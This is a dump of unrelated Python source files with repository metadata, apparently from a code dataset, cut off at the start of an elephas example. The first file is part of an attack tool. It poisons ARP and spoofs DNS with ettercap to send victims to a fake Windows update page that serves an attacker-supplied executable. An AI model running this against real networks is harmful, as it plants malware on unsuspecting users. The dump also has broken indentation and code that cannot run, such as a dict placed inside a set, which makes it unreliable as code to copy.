self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_start,0,3)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Modules/Win-Explo/Windows_Update/index.html"):
remove("Modules/Win-Explo/Windows_Update/index.html")
if path.isfile("Modules/Win-Explo/Windows_Update/windows-update.exe"):
remove("Modules/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Modules/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
                except OSError as e:
                    print(e)
            if getuid() == 0:
                file_html = open("Modules/Win-Explo/Settings_WinUpdate.html","r").read()
                settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file) // 1024) + "KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
                if self.path_file_etter is None:
                    QMessageBox.information(self, 'Path not Found', "the file etter.dns was not found; check that ettercap is installed")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
            QMessageBox.information(self, 'Server Phishing Error', "Error: the server did not start...")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
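    # Example (sketch): locating ettercap's DNS spoof config the same way
    # dns_start() does above:
    #   self.find("etter.dns", "/etc/ettercap/")   # -> full path or None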
def getSize(self,filename):
st = stat(filename)
return st.st_size | mit | -4,197,046,734,792,370,000 | 41.273913 | 174 | 0.578688 | false | 3.674225 | true | false | false |
lmazuel/azure-sdk-for-python | azure-mgmt-datafactory/azure/mgmt/datafactory/models/filter_activity.py | 1 | 2393 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .control_activity import ControlActivity
class FilterActivity(ControlActivity):
"""Filter and return results from input array based on the conditions.
:param additional_properties: Unmatched properties from the message are
     deserialized to this collection
:type additional_properties: dict[str, object]
:param name: Activity name.
:type name: str
:param description: Activity description.
:type description: str
:param depends_on: Activity depends on condition.
:type depends_on: list[~azure.mgmt.datafactory.models.ActivityDependency]
:param type: Constant filled by server.
:type type: str
:param items: Input array on which filter should be applied.
:type items: ~azure.mgmt.datafactory.models.Expression
:param condition: Condition to be used for filtering the input.
:type condition: ~azure.mgmt.datafactory.models.Expression
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
'items': {'required': True},
'condition': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'depends_on': {'key': 'dependsOn', 'type': '[ActivityDependency]'},
'type': {'key': 'type', 'type': 'str'},
'items': {'key': 'typeProperties.items', 'type': 'Expression'},
'condition': {'key': 'typeProperties.condition', 'type': 'Expression'},
}
def __init__(self, name, items, condition, additional_properties=None, description=None, depends_on=None):
super(FilterActivity, self).__init__(additional_properties=additional_properties, name=name, description=description, depends_on=depends_on)
self.items = items
self.condition = condition
self.type = 'Filter'
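# Illustrative construction (sketch): Expression is the companion model from
# this generated package, and the expression strings below are placeholders.
#   from azure.mgmt.datafactory.models import Expression
#   activity = FilterActivity(
#       name='FilterNonEmpty',
#       items=Expression(value="@activity('GetItems').output.value"),
#       condition=Expression(value="@greater(item().size, 0)"))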
| mit | -4,644,261,528,565,139,000 | 41.732143 | 148 | 0.623903 | false | 4.398897 | false | false | false |
OctavianLee/Pywechat | pywechat/services/wechat_card.py | 1 | 16043 | # -*- coding: utf-8 -*-
from pywechat.services.basic import Basic
class CardService(Basic):
"""This class is an implement of the Wechat service of card.
All request's urls come from the official documents.
Link: https://mp.weixin.qq.com/wiki/home/index.html
"""
def upload_image(self, image):
"""Uploads the image for the logo of card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Args:
            image: the image file object, e.g. open(image_name, 'rb')
Returns:
            the json data. Example:
{"url":"http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkm/0"}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/cgi-bin/media/uploadimg'
files = {'buffer': image}
json_data = self._send_request('post', url, files=files)
return json_data
def get_colors(self):
"""Gets the available colors of cards.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"colors":[
{"name":"Color010","value":"#55bd47"},
{"name":"Color020","value":"#10ad61"},
{"name":"Color030","value":"#35a4de"},
{"name":"Color040","value":"#3d78da"},
{"name":"Color050","value":"#9058cb"},
{"name":"Color060","value":"#de9c33"},
{"name":"Color070","value":"#ebac16"},
{"name":"Color080","value":"#f9861f"},
{"name":"Color081","value":"#f08500"},
{"name":"Color090","value":"#e75735"},
{"name":"Color100","value":"#d54036"},
{"name":"Color101","value":"#cf3e36"}
]
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
url = 'https://api.weixin.qq.com/card/getcolors'
json_data = self._send_request('get', url)
return json_data
def create_card(
self, card_dict, card_type, date_info,
logo_url, code_type, brand_name, title,
color, notice, description, quantity,
**infos):
"""Creates a card.
Link:
https://mp.weixin.qq.com/wiki/8/b7e310e7943f7763450eced91fa793b0.html
Returns:
            the json data. Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRK/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"brand_name": brand_name,
"title": title,
"code_type": code_type,
"color": color,
"notice": notice,
"description": description,
"sku": {
"quantity": quantity
},
"date_info": date_info
}
base_info.update(infos)
data = {
"card": {
"card_type": card_type.upper(),
card_type.lower(): {
"base_info": base_info
}
}
}
data["card"][card_type].update(card_dict)
url = 'https://api.weixin.qq.com/card/create'
json_data = self._send_request('post', url, data=data)
return json_data
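    # Illustrative call (sketch; every value below is a placeholder):
    #   service.create_card(
    #       card_dict={'deal_detail': '...'}, card_type='GROUPON',
    #       date_info={'type': 1, 'begin_timestamp': 0, 'end_timestamp': 0},
    #       logo_url='http://...', code_type='CODE_TYPE_TEXT',
    #       brand_name='...', title='...', color='Color010',
    #       notice='...', description='...', quantity=100)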
def create_qrcode(self, code, **infos):
"""Creates a qr code.
(Link:
https://mp.weixin.qq.com/wiki/12/ccd3aa0bddfe5211aace864de00b42e0.html)
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"ticket":"gQG28DoAAAAAAAAAASxodHRwOi8vd2VpeGluLnFxLmN=="
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
card_dict = {
"code": code
}
card_dict.update(infos)
data = {
"action_name": "QR_CARD",
"action_info": {
"card": {
card_dict
}
}
}
url = 'https://api.weixin.qq.com/card/qrcode/create'
json_data = self._send_request('post', url, data=data)
return json_data
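    # Example (sketch): the returned ticket can be exchanged for a QR image
    # through WeChat's standard showqrcode endpoint; `service` is a
    # placeholder and the ticket must be URL-encoded by the caller.
    #   data = service.create_qrcode('7893')
    #   img_url = ('https://mp.weixin.qq.com/cgi-bin/showqrcode?ticket=%s'
    #              % data['ticket'])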
def unavailable_code(self, code, card_id=None):
"""Sets the code is unavailable.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/unavailable'
json_data = self._send_request('post', url, data=data)
return json_data
def decrypt_code(self, encrypt_code):
"""Decrypts the code.
Link:
https://mp.weixin.qq.com/wiki/5/3e7bccd4a8082733b2c86c3dcc9a636d.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"card":{"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc"},
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"encrypt_code": encrypt_code
}
        url = 'https://api.weixin.qq.com/card/code/decrypt'
json_data = self._send_request('post', url, data=data)
return json_data
def get_code(self, code, card_id=None):
"""Get the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"openid":"oFS7Fjl0WsZ9AMZqrI80nbIq8xrA",
"card":{
"card_id":"pFS7Fjg8kV1IdDz01r4SQwMkuCKc",
"begin_time": 1404205036,
"end_time": 1404205036,
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/get'
json_data = self._send_request('post', url, data=data)
return json_data
def get_card(self, card_id):
"""Get the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"card": {
"card_type": "GROUPON",
"groupon": {
"base_info": {
"logo_url": "http://mmbiz.qpic.cn/mmbiz/iaL1LJM1mF9aRKPZJkmG8x/0",
"brand_name":"海底捞",
"code_type":"CODE_TYPE_TEXT",
"title": "132元双人火锅套餐",
"sub_title": "周末狂欢必备",
"color": "Color010",
"notice": "使用时向服务员出示此券",
"service_phone": "020-88888888",
"description": "不可与其他优惠同享\n如需团购券发票,请在消费时向商户提出\n店内均可使用,仅限堂食",
"date_info": {
"type": 1,
"begin_timestamp": 1397577600,
"end_timestamp": 1422724261
},
"sku": {
"quantity": 50000000
},
"get_limit": 3,
"use_custom_code": false,
"bind_openid": false,
"can_share": true,
"can_give_friend": true,
"location_id_list": [123, 12321, 345345],
"custom_url_name": "立即使用",
"custom_url": "http://www.qq.com",
"custom_url_sub_title": "6个汉字tips",
"promotion_url_name": "更多优惠",
"promotion_url": "http://www.qq.com",
"source": "大众点评"
},
"deal_detail": "以下锅底2选1(有菌王锅、麻辣锅、大骨锅、番茄锅、清补凉锅、酸菜鱼锅可选):\n大锅1份
12元\n小锅2份16元"}
}
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/get'
json_data = self._send_request('post', url, data=data)
return json_data
def batchget_card(self, offset, count):
"""Get a list of cards.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok",
"card_id_list":["ph_gmt7cUVrlRk8swPwx7aDyF-pg"],
"total_num":1
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"offset": offset,
"count": count
}
url = 'https://api.weixin.qq.com/card/batchget'
json_data = self._send_request('post', url, data=data)
return json_data
def update_card(
self, card_id, card_type,
logo_url, notice, description, color, detail=None,
bonus_cleared=None, bonus_rules=None, balance_rules=None, prerogative=None,
**infos):
"""Updates a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
base_info = {
"logo_url": logo_url,
"notice": notice,
"description": description,
"color": color,
"detail": detail
}
base_info.update(infos)
data = {
"card_id": card_id,
card_type.lower(): {
"base_info": base_info,
"bonus_cleared": bonus_cleared,
"bonus_rules": bonus_rules,
"balance_rules": balance_rules,
"prerogative": prerogative
}
}
url = 'https://api.weixin.qq.com/card/update'
json_data = self._send_request('post', url, data=data)
return json_data
def modify_stock(
self, card_id,
increase_stock_value=None,
reduce_stock_value=None):
"""Modifies the stock of a card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id,
}
if increase_stock_value:
data["increase_stock_value"] = increase_stock_value
if reduce_stock_value:
data["reduce_stock_value"] = reduce_stock_value
url = 'https://api.weixin.qq.com/card/modifystock'
json_data = self._send_request('post', url, data=data)
return json_data
def update_code(self, code, new_code, card_id=None):
"""Updates the code.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"code": code,
"new_code": new_code
}
if card_id:
data["card_id"] = card_id
url = 'https://api.weixin.qq.com/card/code/update'
json_data = self._send_request('post', url, data=data)
return json_data
def delete_card(self, card_id):
"""Deletes the card.
Link:
https://mp.weixin.qq.com/wiki/3/3f88e06725fd911e6a46e2f5552d80a7.html
Returns:
            the json data. Example:
{
"errcode":0,
"errmsg":"ok"
}
Raises:
WechatError: to raise the exception if it contains the error.
"""
data = {
"card_id": card_id
}
url = 'https://api.weixin.qq.com/card/delete'
json_data = self._send_request('post', url, data=data)
return json_data
| mit | 8,913,607,778,783,713,000 | 30.793456 | 95 | 0.447932 | false | 3.574845 | false | false | false |
pculture/mirocommunity | localtv/migrations/0010_remove_author.py | 1 | 14261 | from south.db import db
from django.db import models
from localtv.models import *
class Migration:
def forwards(self, orm):
# Dropping ManyToManyField 'Feed.auto_authors'
db.delete_table('localtv_feed_auto_authors')
# Dropping ManyToManyField 'Video.authors'
db.delete_table('localtv_video_authors')
# Deleting model 'author'
db.delete_table('localtv_author')
def backwards(self, orm):
# Adding ManyToManyField 'Feed.auto_authors'
db.create_table('localtv_feed_auto_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('feed', models.ForeignKey(orm.Feed, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding ManyToManyField 'Video.authors'
db.create_table('localtv_video_authors', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('video', models.ForeignKey(orm.Video, null=False)),
('author', models.ForeignKey(orm.author, null=False))
))
# Adding model 'author'
db.create_table('localtv_author', (
('site', orm['localtv.author:site']),
('logo', orm['localtv.author:logo']),
('id', orm['localtv.author:id']),
('name', orm['localtv.author:name']),
))
db.send_create_signal('localtv', ['author'])
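    # These schema operations run through South's migrate command, e.g.
    # (sketch): ./manage.py migrate localtv 0010   # forwards
    #           ./manage.py migrate localtv 0009   # backwards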
models = {
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.savedsearch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {})
},
'localtv.video': {
'authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Tag']", 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997982)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2009, 9, 10, 10, 14, 13, 997849)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'localtv.sitelocation': {
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'frontpage_style': ('django.db.models.fields.CharField', [], {'default': "'list'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
'localtv.tag': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'localtv.watch': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'localtv.category': {
'Meta': {'unique_together': "(('slug', 'site'), ('name', 'site'))"},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'child_set'", 'blank': 'True', 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'localtv.author': {
'Meta': {'unique_together': "(('name', 'site'),)"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)"},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'auto_authors_user': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'localtv.openiduser': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'localtv.profile': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['localtv']
| agpl-3.0 | -6,726,288,681,998,937,000 | 71.390863 | 172 | 0.539934 | false | 3.65292 | false | false | false |
maxpumperla/elephas | examples/mnist_mlp_spark_asynchronous.py | 1 | 1835 | from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.optimizers import SGD
